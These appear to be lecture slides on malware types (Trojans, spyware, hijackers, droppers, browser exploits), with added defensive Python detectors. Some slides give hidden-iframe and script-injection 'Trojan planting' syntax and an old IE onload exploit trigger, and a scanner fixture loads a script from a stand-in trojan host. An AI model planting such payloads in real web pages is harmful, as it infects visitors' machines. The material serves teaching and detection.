Malware

The Attack and Defense of Computers
Dr. 許 富 皓
1
Malware
2
Malicious Software (Malware):
- Security tools and toolkits
- Back doors (trap doors)
- Logic bombs
- Viruses
- Worms
- Binders
- Droppers
- Trojan Horses
- Browser Hijacker
- Spyware
- Rootkit
- URL Injection
- …
3
Security Tools and Toolkits
- Automatically scan for computer security weaknesses.
  - Can be used by both security professionals and attackers.
  - e.g. Nessus, COPS, ISS, Tiger, … and so on.
- Unwittingly release reports to the public.
- There are also programs and tool sets whose only function is to attack computers.
  - Script kiddies
  - P.S. These tools may damage the systems that install them, or may contain booby traps that will compromise the systems that install them.
4
Logic Bombs
- A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.
  - For example, a programmer may hide a piece of code that starts deleting files should he ever leave the company (and its salary database).
- Usually written by insider programmers.
5
Logic Bombs and Viruses and Worms
- Software that is inherently malicious, such as viruses and worms, often contains logic bombs that execute a certain payload
  - at a pre-defined time, or
  - when some other condition is met.
- Many viruses attack their host systems on specific dates, such as Friday the 13th or April Fool's Day.
- Trojans that activate on certain dates are often called "time bombs".
6
Key Logger
- A program or hardware device that captures every key depression on the computer.
  - Also known as "Keystroke Cops," they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing, and retyping.
7
Security Concerns about Key Loggers
- Keystroke logging can be achieved by both hardware and software means.
- There is no easy way to prevent keylogging software from being installed on your PC, as it is usually done by stealth.
- If you are using a home PC, then it is likely to be free of any keystroke logging hardware (but remember there may be keystroke logging software).
8
Precautions against Key Loggers
- Try to avoid typing private details on public PCs.
  - Always try to avoid visiting sites on public PCs that require you to enter your login details, e.g. an online banking account.
9
Example

Ardamax Keylogger [1]
10
URL Injection
- Change the URL submitted to a server belonging to some or all domains.
11
Browser Hijacker
12
Browser Hijacker [Rouse]
- A browser hijacker (sometimes called hijackware) is a type of malware program that alters your computer's browser settings so that you are redirected to Web sites that you had no intention of visiting.
13
Symptoms of Browser Hijackers (1) [Khanse]
- Home page is changed
- Default search engine is changed
- You can't navigate to certain web pages, like home pages of security software
- You get re-directed to pages you never intended to visit
14
Symptoms of Browser Hijackers (2)
- You see ads, or ads pop up on your screen, but these ads are not served by the website
- You see new toolbars added
- You see new Bookmarks or Favorites added
- Your web browser starts running sluggishly
15
Infection of Browser Hijackers [Rouse]
- A browser hijacker may be installed as part of a freeware installation.
- A browser hijacker may also be installed without user permission, as the result of an infected e-mail, a file share, or a drive-by download.
16
Redirection [PCSTATS]
- As well as making changes to your home page and other IE settings, a hijacker may also make entries in the hosts file on your system.
  - This special file directly maps DNS names (the host names in web URLs) to IP addresses, so every time you type certain URLs you may be redirected to the IP address of a sponsored search or porn site instead.
17
Absolute File Name of file hosts
C:\WINDOWS\SYSTEM32\drivers\etc\hosts
18
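As an added defensive example (not from the slides), the following Python audit parses a hosts file in the format above and flags the two hijacker patterns the slide describes: well-known domains redirected to an outside IP, and security-vendor sites black-holed to a local address. The sample hosts content and the watch list are constructed for this example.

```python
import ipaddress

# Constructed sample in the format of C:\WINDOWS\SYSTEM32\drivers\etc\hosts;
# the hijacker lines are invented for this example (203.0.113.0/24 is a
# documentation range, and .invalid is a reserved TLD).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# entries a hijacker might append (constructed)
203.0.113.45    www.google.com search.yahoo.com
203.0.113.45    www.bing.com
0.0.0.0         update.example-antivirus.invalid   # security vendor blocked
"""

# Addresses that resolve to "nowhere" or to the local machine.
LOCAL_ADDRS = {"127.0.0.1", "::1", "0.0.0.0"}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in hosts-file text.
    Comments (#) and blank lines are skipped; one line may list several names."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not an address: malformed line, ignore it
        for name in parts[1:]:
            yield parts[0], name.lower(), line_no


def audit_hosts(text, watch_domains):
    """Return a list of (kind, hostname, ip, line_no) findings.

    'redirect'  - a name mapped to a non-local address: the slide's sponsored
                  site / porn site redirection (legitimate intranet entries
                  also show up here and must be reviewed by hand).
    'blackhole' - a watched name (e.g. a security vendor's update site) mapped
                  to a local or null address so the user can no longer reach it.
    """
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name == "localhost":
            continue  # the only mapping a clean Windows hosts file carries
        if ip in LOCAL_ADDRS:
            if name in watch_domains:
                findings.append(("blackhole", name, ip, line_no))
        else:
            findings.append(("redirect", name, ip, line_no))
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS, {"update.example-antivirus.invalid"}):
        print("%-9s line %d: %s -> %s" % (f[0], f[3], f[1], f[2]))
```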
Self-Protection Mechanisms of Browser Hijackers [PCSTATS]
- These programs often use a combination of hidden files and registry settings to reinstall themselves after removal, so deleting them or changing your IE settings back may well not work.
19
Add-on
20
Add-on [stackoverflow]
- Add-on: essentially anything that can be installed into the browser.
  - This includes, for example:
    - extensions
    - themes
    - plug-ins
    - dictionaries
    - language packs
    - search engines.
21
Terminologies [alex301]
- plug-in = things that must be compiled into an executable and that provide the browser with extra functionality.
- extension = things written in a program syntax the browser supports, used to change the browser's functionality and operation.
- theme = things written in a program syntax the browser supports, used to change the browser's look and feel.
- addon = plugin + extension + theme = the collective term for everything outside the browser itself that is used to modify the browser.
22
Browser Plug-in [mozillazine]
- Plug-ins add new functionality to an application, such as
  - viewing special graphical formats, or
  - playing multimedia content in a web browser.
- Plug-ins also differ from extensions, which modify or add to existing functionality.
23
Browser Plug-in [wikipedia]
- Plug-ins add specific abilities into browsers using application programming interfaces (APIs), allowing third parties to create plug-ins that interact with the browser.
- The original API was NPAPI, but subsequently Google introduced the PPAPI interface in Chrome.
24
General Plug-in Framework [wikipedia]
25
General Plug-in Mechanism [wikipedia]
- A host application provides services which the plug-in can use, including a way for plug-ins to register themselves with the host application and a protocol for the exchange of data with plug-ins.
26
Uses of Browser Plug-ins
- Common uses of plug-ins on the web include
  - displaying video in the browser,
  - games, and
  - music playback.
- Widely used plug-ins include Java, Flash, Quicktime, and Adobe Reader.
27
Browser Plug-in Form
- A plug-in in the context of Mozilla-based applications is a binary component that, when registered with a browser, can display content that the browser itself cannot display natively.
28
Extension [wikipedia 1] [wikipedia 2]
- Extensions can be used to
  - modify the behavior of existing features of an application, or
  - add entirely new features.
- Therefore, after integration, extensions can be seen as part of the browser itself, tailored from a set of optional modules.
29
Extension technologies (1) [wikipedia]
- CSS (Cascading Style Sheets)
- DOM (Document Object Model) – Used to change XUL in real-time or to edit HTML that is currently loaded
- JavaScript – The primary language of Mozilla browsers
- XPCOM (Cross-Platform Component Object Model)
30
Extension technologies (2) [wikipedia]
- XPConnect
- XPI (Cross-Platform Installer)
- XUL (XML User Interface Language) – Used to define the UI (User Interface) and interaction with the user.
- Mozilla Jetpack – a development kit aiming to lower the learning curve and development time for making add-ons
31
IE Extension [ivy]
Internet Explorer->Tools->Manage Addons
32
Mozilla Firefox [ivy]
Mozilla Firefox->Tools->Add-ons->Extensions
33
Google Chrome [ivy]
Google Chrome->Wrench Icon->Tools->Extensions
34
Browser Toolbar [wikipedia]
- A browser toolbar is a toolbar that resides within a browser's window.
- All major web browsers provide support for browser toolbar development as a way to extend the browser's GUI and functionality.
- Browser toolbars are considered to be a particular kind of browser extension that presents a toolbar.
35
Binder [CA]
36
Definition of Binder
- A tool that combines two or more files into a single file, usually for the purpose of hiding one of them.
- A binder compiles the list of files that you select into one host file, which you can rename.
- A host file is a simple custom compiled program that will decompress and launch the embedded programs.
  - When you start the host, the embedded files in it are automatically decompressed and launched.
37
Example
- When a piece of malware is bound with Notepad, for instance, the result will appear to be Notepad, and appear to run like Notepad, but the piece of malware will also be run.
38
Program
- YAB: Yet Another Binder
  - User Guide
39
Embedded Files
- The files embedded in a host file are not always binary files. An embedded file can be a file of any type.
- Even if an embedded file is a binary file, it may be a normal program.
40
Dropper [Wikipedia]
41
Definition of a Dropper
- A dropper is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc.) on a target system.
  - Single stage: the malware code can be contained within the dropper in such a way as to avoid detection by virus scanners.
  - Two stages: the dropper may download the malware to the target machine once activated.
42
Types of Droppers
- Depending on how a dropper is executed, there are two major types of droppers:
  - those that do not require user interaction, and work through the exploitation of some vulnerability in the system;
  - those that require user interaction, by convincing the user that it is some legitimate or benign program.
43
Trojan Horse [Wikipedia]
44
Trojan Horse
- In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software.
- Trojans use false and fake names to trick users into executing them.
  - These strategies are often collectively termed social engineering.
- A Trojan is designed to operate with functions unknown to the victim.
  - The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
45
Properties of Trojan Horses
- Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like worms.
- Just as the Greeks needed the Trojans to bring the horse inside for their plan to work,
  - Trojan horse programs depend on actions by the intended victims;
  - if Trojans replicate and even distribute themselves, each new victim must run the program/Trojan.
- Due to the above reasons, Trojan horses' virulence depends on
  - successful implementation of social engineering concepts
  but doesn't depend on
  - the flaws in a computer system's security design or configuration.
46
Categories of Trojan Horses
- There are two common types of Trojan horses:
  - a useful piece of software that has been corrupted by a cracker inserting malicious code that executes while the program is used.
    - Examples include various implementations of
      - weather alerting programs
      - computer clock setting software
      - peer to peer file sharing utilities.
  - a standalone program that masquerades as something else, like a game or image file (e.g. firework.jpg.exe in Windows).
47
Malware Parasitizes inside Trojan Horses
- In practice, Trojan Horses in the wild often contain:
  - spying functions (such as a packet sniffer)
  - backdoor functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a zombie computer.
- The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things.
- Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.
48
Example of a Simple Trojan Horse
- A simple example of a Trojan horse would be a program named waterfalls.jpg.exe claiming to be a free waterfall picture which, when run, instead begins erasing all the files on the computer.
49
E-Mail Trojan Horses
- On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file.
- The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif.
  - Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse's extension might be "masked" by giving it a name such as Readme.txt.exe.
  - With file extensions hidden, the user would only see Readme.txt and could mistake it for a harmless text file.
  - Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.
50
Unicode Control Character 202E File Extension Spoofing [劉昱賢][1]
- This technique exploits the way an operating system interprets file names: when it encounters a Unicode control character, it changes how the file name is displayed. An attacker can insert specific Unicode control characters into a file name so that the operating system misleads the user when it displays that name.
  大師兄[202E]gpj.exe   (real filename)
- The part in brackets is the Unicode control character 202E, an invisible control code that makes the following characters display from right to left (Right To Left Override).
- When the operating system interprets and displays the file name, it shows it as:
  大師兄exe.jpg   (displayed filename)
51
Unicode Control Character 202E File Extension Spoofing [劉昱賢]
52
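As an added example (not part of the slides), the following Python code reproduces the display trick on the name 大師兄[202E]gpj.exe and shows the check a defender or a mail/file gateway can apply: flag bidi control characters in a file name and compare the extension the user would see with the one the OS actually uses. The displayed_name rendering is a simplified bidi model (it handles only RLO/PDF) and the sample filename is constructed from the slide.

```python
import unicodedata

# Bidi control characters that can make a displayed file name differ from
# the real one. U+202E (RLO) is the one used in the slide's example.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",   # LRE RLE PDF LRO RLO
    "\u2066", "\u2067", "\u2068", "\u2069",             # LRI RLI FSI PDI
    "\u200e", "\u200f", "\u061c",                       # LRM RLM ALM
}
RLO = "\u202e"
PDF = "\u202c"


def displayed_name(real_name):
    """Approximate how a file manager renders a name containing U+202E:
    text after an RLO is drawn right-to-left (i.e. reversed) until a PDF
    (U+202C) or the end of the name. Other controls are invisible and dropped.
    Simplified bidi model, sufficient for the 'gpj.exe' trick on the slide."""
    out, i = [], 0
    while i < len(real_name):
        ch = real_name[i]
        if ch == RLO:
            end = real_name.find(PDF, i + 1)
            if end == -1:
                end = len(real_name)
            out.append(real_name[i + 1:end][::-1])
            i = end + 1  # skip the PDF terminator if there is one
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def real_extension(real_name):
    """The extension the OS actually uses: text after the last '.' of the
    real (un-rendered) name, with control characters removed."""
    clean = "".join(c for c in real_name if c not in BIDI_CONTROLS)
    dot = clean.rfind(".")
    return clean[dot:].lower() if dot != -1 else ""


def check_filename(real_name):
    """Describe a file name: what the user sees, what the OS will execute,
    which bidi controls are present, and whether the two extensions differ."""
    controls = sorted({unicodedata.name(c, "U+%04X" % ord(c))
                       for c in real_name if c in BIDI_CONTROLS})
    shown = displayed_name(real_name)
    dot = shown.rfind(".")
    apparent_ext = shown[dot:].lower() if dot != -1 else ""
    real_ext = real_extension(real_name)
    return {
        "displayed": shown,
        "real_extension": real_ext,
        "apparent_extension": apparent_ext,
        "controls": controls,
        "spoofed": bool(controls) and apparent_ext != real_ext,
    }


# Constructed file name reproducing the slide's example: 大師兄[202E]gpj.exe
SAMPLE = "大師兄" + RLO + "gpj.exe"

if __name__ == "__main__":
    for k, v in check_filename(SAMPLE).items():
        print("%-19s %s" % (k + ":", v))
```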
Commonly Used Methods of Infection
- E-mails.
- Downloaded Files.
53
Emails and Trojan Horses
- The majority of Trojan horse infections occur because the user was tricked into running an infected program.
- This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
54
Downloaded Files
- The infected program doesn't have to arrive via email, though; it can be
  - sent to you in an Instant Message
  - downloaded from a Web site or by FTP
  - delivered on a CD or floppy disk
55
Precautions against Trojan Horses (1)
- Trojan Horses are commonly spread through e-mail, much like other types of common viruses.
- The best ways to protect yourself and your company from Trojan Horses are as follows:
  - If you receive e-mail from someone that you do not know, or you receive an unknown attachment, never open it right away.
  - As an e-mail user you should confirm the source.
    - P.S.: Some hackers have the ability to steal address books, so if you see e-mail from someone you know that does not necessarily make it safe.
56
Precautions against Trojan Horses (2)
- When setting up your e-mail client, make sure that you have the settings so that attachments do not open automatically.
- Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened.
  - If your client does not come with this, it would be best to purchase one or download one for free.
- Make sure your computer has an anti-virus program on it, and make sure you update it regularly.
  - If you have an auto-update option included in your antivirus program you should turn it on; that way, if you forget to update your software you can still be protected from threats.
57
Precautions against Trojan Horses (3)
- Avoid using peer-2-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because
  1) those programs are generally unprotected from Trojan Horses
  2) Trojan Horses are especially easy to spread through these programs
- Some of these programs do offer some virus protection, but often it is not strong enough.
58
Precautions against Trojan Horses (4)
- NEVER download blindly from people or sites which you aren't 100% sure about.
  - Even if the file comes from a friend, you still must be sure what the file is before opening it.
    - However, legitimate web sites may be compromised by attackers who modify web pages to contain scripts that download malware.
    - Ask your friend whether she/he sent the files to you.
- Beware of hidden file extensions (under Windows, susie.jpg.exe is only shown as susie.jpg).
- Never use features in your programs that automatically get or preview files (Outlook, preview mode).
- Never blindly type commands that others tell you to type, or go to the web site mentioned by strangers.
59
Well-known Trojan Horses
- Back Orifice
- Back Orifice 2000
- Beast Trojan
- NetBus
- SubSeven
- Downloader-EV
- Pest Trap
- flooder
- Tagasaurus
- Vundo trojan
- Gromozon Trojan
60
List of Trojan Horses

http://en.wikipedia.org/wiki/List_of_trojan_horses
61
Web Page Trojan Planting (網頁掛馬) [趨勢科技]
62
Definition [趨勢科技] [fanli7]
- "網頁掛馬" (web page Trojan planting) is also called a hidden malicious link in a web page.
- The attacker first designs a special web page (the Trojan page) targeting a particular vulnerability (usually a Windows or IE vulnerability); when an ordinary user being attacked browses this page, the vulnerability is exploited to silently download the malicious program to the attacked computer and run it.
63
Websites
- You can be infected by visiting a rogue website.
- Internet Explorer is most often targeted by makers of Trojans and other pests.
- Some of the IE bugs improperly handle data (such as HTML or images) by executing it as a legitimate program.
  - Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
64
Features vs. Risks
- The more "features" a web browser has, the higher your risk of having security holes that can be exploited by a Trojan horse.
  - for example:
    - ActiveX objects,
    - some older versions of Flash
    - Java
65
Example 1: Microsoft IE window() Arbitrary Code Execution Vulnerability [Secunia]
- The vulnerability is caused due to certain objects not being initialized correctly when the window() function is used in conjunction with the <body onload> event.
- This can be exploited to execute arbitrary code on a vulnerable browser via some specially crafted JavaScript code called directly when a site has been loaded.
  Example:
  <body onload="window();">
- Successful exploitation requires that the user is e.g. tricked into visiting a malicious website.
PROOF OF CONCEPT
66
Explanation [Computer Terrorism]
67
<body onLoad= …> [HTML Code Tutorial]
- The browser triggers onLoad when the document is finished loading.
- The contents of onLoad is one or more JavaScript commands.
  - So, for example, the following <BODY ...> tag tells the browser to bring up an alert box once the page is completely loaded:
    <BODY onLoad="alert('hello world!')">
68
MS IE - Crash on JavaScript window()- calling (1)
- There is a bug in Microsoft Internet Explorer, which causes a crash in it.
- The bug occurs because Microsoft Internet Explorer can't handle a call to a JavaScript function with the name of the "window" object, an object used in JavaScript.
69
MS IE - Crash on JavaScript window()- calling (2) [symantic]
- Internet Explorer fails to properly initialize the JavaScript `Window()' function. When the 'onLoad' handler is set to call the improperly initialized `Window()' function, the Web browser attempts to call the address 0x006F005B, which is derived from the Unicode representation of 'OBJECT'.
  CALL DWORD [ECX+8]
  1. Crash, if pointing to non-code.
  2. Execution, if pointing to code.
- It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space.
70
Dangerous Web Site
- The web site pointed to by the following URL is one containing the trap described in the previous slides.
- HTTP MSIE JavaScript OnLoad Rte CodeExec [symantic]
  http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
71
Microsoft Outlook
- If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly.
- The same vulnerabilities exist since Outlook
  - allows email to contain HTML and images, and
  - actually uses much of the same code to process these as Internet Explorer.
72
Example 2: Trojan Horse Exploits Image Flaw [Declan McCullagh et al.]
- EasyNews, a provider of Usenet newsgroups, said it has identified two JPEG images that take advantage of a previously identified flaw (a heap-based buffer overflow [Michael Cobb]) in the way Microsoft software handles graphics files.
- Windows users could have their computers infected merely by opening one of those Trojan horse images.
- Attackers tried to use these JPEGs to download Trojan (horse programs) to vulnerable computers.
73
Example 3: Compromise a Web Server and Add Hidden Download Instructions in Web Pages (網站掛馬)
- Create a frame with size 0.
74
Web Site Trojan-Planting Syntax (網站掛馬語法) [OpenBlue]
75

- Usually, after a page has been Trojan-planted through [a vulnerability], [SQL Injection] or similar techniques, [the relevant planted code] will appear in [the first or last line] of that web page.
76
Frame (iframe) Trojan Planting
- Part of the syntax is as follows (木馬網址 stands for the Trojan page's URL):
  <iframe src=木馬網址 width=0 height=0></iframe>
77
JScript File Trojan Planting
- First, save the following code as xxx.js:
  document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
- Then upload this file to the target location by whatever means are available.
- For example, the JScript planting syntax is:
  <script language=javascript src=xxx.js></script>
78
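As an added detection example (not part of the slides or of OpenBlue), the following Python scanner looks for the two planted patterns above in a page: zero-size (or 1-pixel) iframes and scripts loaded from a host other than the site's own, and reports whether each sits on the first or last line, where the slides say planted code usually appears. The sample page, the site host shop.example.com and the .invalid URLs are constructed.

```python
import re

# Constructed sample page: a harmless shop page whose last line carries the
# two planting patterns from the slides. All URLs are placeholders.
SAMPLE_PAGE = """<html>
<head><title>Shop</title><script src="/js/app.js"></script></head>
<body>
<h1>Welcome</h1>
<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>
</body></html>
<iframe src=http://trojan.example.invalid/x.htm width=0 height=0></iframe><script language=javascript src=http://trojan.example.invalid/xxx.js></script>
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>", re.I)
# name=value with double-quoted, single-quoted or bare values (the planted
# samples on the slides use bare values such as width=0).
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HOST_RE = re.compile(r"https?://([^/:]+)", re.I)


def attrs(tag_body):
    """Parse the attributes of one tag into a lowercase-keyed dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag_body)}


def is_hidden_size(value):
    """True when a width/height value renders nothing visible (0 or 1 px)."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def scan_page(html, site_host):
    """Return (kind, src, line_no, on_edge) findings for planted-code patterns.

    kind is 'hidden_iframe' (width or height 0/1) or 'external_script'
    (script src on a host other than site_host). on_edge is True when the
    tag sits on the first or last non-empty line of the page, the spot the
    slides single out. Relative script paths are treated as first-party.
    """
    lines = html.splitlines()
    nonempty = [i for i, l in enumerate(lines, 1) if l.strip()]
    if not nonempty:
        return []
    edges = {nonempty[0], nonempty[-1]}
    findings = []
    for line_no, line in enumerate(lines, 1):
        on_edge = line_no in edges
        for m in IFRAME_RE.finditer(line):
            a = attrs(m.group(1))
            if is_hidden_size(a.get("width")) or is_hidden_size(a.get("height")):
                findings.append(("hidden_iframe", a.get("src", ""), line_no, on_edge))
        for m in SCRIPT_RE.finditer(line):
            src = attrs(m.group(1)).get("src", "")
            host = HOST_RE.match(src)
            if host and host.group(1).lower() != site_host.lower():
                findings.append(("external_script", src, line_no, on_edge))
    return findings


if __name__ == "__main__":
    for kind, src, line_no, on_edge in scan_page(SAMPLE_PAGE, "shop.example.com"):
        print("%-16s line %d%s: %s" % (kind, line_no, " (edge)" if on_edge else "", src))
```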
Precautions against Trojan Planting (掛馬)
- Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses.
  - Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system.
  - If you keep your system updated with these patches, your computer is kept much safer.
79
Spyware [Wikipedia]
80
A Large Number of Toolbars, Some Added by Spyware, Overwhelm an IE Session
81
Some Statistics about Spyware [A. Moshchuk et al.][Webroot]
- 2005
  - A scan (2005) performed by AOL/NCSA of 329 customers' computers found that 80% were infected with spyware programs.
  - Each infected computer contained an average of 93 spyware components.
- 2006:
  - Despite the publicity about the dangers of spyware, infection rates are on the rise. Webroot spyware scan data shows that 89 percent of consumer PCs are infected with spyware.
  - U.S. home computer users are infected with an average of 30 pieces of spyware on their PCs.
82
Definition of Spyware
- Spyware is computer software that is installed surreptitiously on a personal computer to
  - monitor
  - intercept, or
  - take partial control over
  the user's interaction with the computer, without the user's informed consent.
83
Activities of Spyware
- Spyware programs can
  - secretly monitor the user's behavior and then send this information to a hacker over the Internet
  - collect various types of personal information
  - interfere with user control of the computer in other ways, such as
    - installing additional software
    - redirecting Web browser activity
    - diverting advertising revenue to a third party.

84
Spyware Functions [A. Moshchuk et al.]
85
Types of Information Collected by Spyware
- Spyware can collect many different types of information about a user.
- More benign programs can
  - attempt to track what types of websites a user visits, and
  - send this information to an advertisement agency.
- More malicious versions can try to record what a user types to try to intercept passwords or credit card numbers.
86
OSes vs. Spyware
- As of 2006, spyware has become one of the preeminent security threats to computer systems running Microsoft Windows OSes.
- Some malware on the Linux and Mac OS X platforms has behavior similar to Windows spyware, but to date has not become anywhere near as widespread.

87
Spyware Certification
- The Spyware-Free Certification program evaluates software to ensure that the program does not install or execute any forms of malicious code.
88
Typical Tactics Adopted by Spyware
- Delivery of unsolicited pop-up advertisements.
- Monitoring of Web-browsing activity for marketing purposes.
- Theft of personal information
89
Adware (1) [wikipedia]
- Adware, or advertising-supported software, is any software package which automatically plays, displays, or downloads advertisements to a computer.
- These advertisements can be in the form of a pop-up.
- They may also be
  - in the user interface of the software, or
  - on a screen presented to the user during the installation process.
90
Adware (2) [wikipedia]
- The object of the Adware is to generate revenue for its author.
- Adware, by itself, is harmless; however, some adware may come with integrated spyware such as keyloggers and other privacy-invasive software.
91
Spyware and Pop-up Ads
- Spyware displays advertisements related to what it finds from spying on you, not the ones posted by advertisers.
- Claria Corporation's Gator Software and Exact Advertising's BargainBuddy provide examples of this sort of program.
- Visited Web sites frequently install Gator on client machines in a surreptitious manner, and it directs revenue to the installing site and to Claria by displaying advertisements to the user.
- The user experiences a large number of pop-up advertisements.
92
Pop-up Ads
- Pop-up ads or popups are a form of online advertising on the World Wide Web.
- It works when certain web pages open a new web browser window to display advertisements.
93
Creation of Pop-up Window
- The pop-up window containing an advertisement is usually generated by JavaScript, but can be generated by other means as well.
<html>
<body>
<script>
window.open('http://www.google.com', "google",
  "width=700,height=500,toolbar=0,menubar=0,location=0,status=1,scrollbars=1,resizable=1,left=0,top=0");
</script>
</body>
</html>
94
Pop-under Ads
- A variation on the pop-up window is the pop-under advertisement. This opens a new browser window behind the active window.
- Pop-unders interrupt the user less, but are not seen until the desired windows are closed, making it more difficult for the user to determine which Web page opened them.

95
Dozens of Pop-up Ads Cover a Desktop.
96
Web Activity Monitor
- Spyware behavior, such as reporting on websites the user visits, frequently accompanies the displaying of advertisements.
- Monitoring web activity aims at building up a marketing profile on users in order to sell "targeted" advertisement impressions.

97
Other Victims of Spyware
- The prevalence of spyware has cast suspicion upon other programs that track Web browsing, even for statistical or research purposes.
- Some observers describe the Alexa Toolbar, an Internet Explorer plug-in published by Amazon.com, as spyware (and some anti-spyware programs report it as such) although many users choose to install it.
98
Identity Theft and Fraud
- Some spyware is closely associated with identity theft.
- Spyware may transmit the following information to attackers:
  - chat sessions,
  - user names,
  - passwords,
  - bank information, etc.
- Spyware has principally become associated with identity theft in that keyloggers are routinely packaged with spyware.
  - John Bambenek, who researches information security, estimates that identity thieves have stolen over $24 billion US dollars of account information in the United States alone.
99
Routes of Infection
100
Routes of Infection
- Spyware does not directly spread in the manner of a computer virus or worm:
  - generally, an infected system does not attempt to transmit the infection to other computers.
- Instead, spyware gets on a system
  - through deception of the user, or
  - through exploitation of software vulnerabilities.
101
Masquerade
- One way of distributing spyware involves tricking users by manipulating security features designed to prevent unwanted installations.
102
Masquerade - Example
- The Internet Explorer Web browser, by design, prevents websites from initiating an unwanted download.
- Instead, a user action (such as clicking on a link) must normally trigger a download.
- However, links can prove deceptive. For instance,
  1. A pop-up ad may appear like a standard Windows dialog box.
  2. The box contains a message such as "Would you like to optimize your Internet access?" with links which look like buttons reading Yes and No.
  3. No matter which "button" the user presses, a download starts, placing the spyware on the user's system.
103
A Masquerade Example
- Malicious websites may attempt to install spyware on readers' computers.
  - In this screenshot a website has triggered a pop-up that offers spyware in the guise of a security upgrade.
104
Bundled with Shareware
- Spyware can also come bundled with
  - shareware
  - other downloadable software
  - music CDs.
- The user downloads a program (for instance, a music program or a file-trading utility) and installs it, and the installer additionally installs the spyware.
- Although the desirable software itself may do no harm, the bundled spyware does.
  - In some cases, spyware authors have paid shareware authors to bundle spyware with their software.
  - In other cases, spyware authors have repackaged desirable free software with installers that add spyware.
105
Bundled Shareware Example
- The BearShare file-trading program, "supported" by WhenU spyware.
- In order to install BearShare, users must agree to install "the SAVE! bundle" from WhenU.
- The installer provides only a tiny window in which to read the lengthy license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to WhenU servers.
106
Through Trojan Horse
- Classically, a Trojan horse, by definition, smuggles in something dangerous in the guise of something desirable. Some spyware programs get spread in just this manner.
- The distributor of spyware presents the program as a useful utility, for instance as a Web accelerator or as a helpful software agent.
- Users download and install the software without immediately suspecting that it could cause harm.
107
Vulnerabilities in Web Browsers
- Some spyware authors infect a system by attacking security holes
  - in the Web browser, or
  - in other software.
- When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and install of spyware.
- Common browser exploits target security vulnerabilities in Internet Explorer and in the Microsoft Java runtime.
108
Notable Programs Distributed with Spyware
- Messenger Plus! (only if you agree to install their "sponsor" program)
- Bearshare
- Bonzi Buddy
- DAEMON Tools (only if you agree to install their "sponsor" program)
- DivX (except for the paid version, and the "standard" version without the encoder). DivX announced removal of GAIN software from version 5.2.
- Dope Wars
- ErrorGuard
- FlashGet (free version)
- Grokster
- Kazaa
- Morpheus
- RadLight
- WeatherBug
- EDonkey2000
109
Worm
110
Worms
- Worms spread themselves by proactively attacking programs with specific vulnerabilities.
- The most frequently used attack approaches include buffer overflow attacks, format string attacks, integer overflow attacks, … and so on.
- Morris Worm, 1988
- Code Red, Slammer.
111
Comparisons between Viruses, Trojan Horses, and Worms
- The way they behave
- How are they triggered?
- How do they spread?
- Need host programs?
112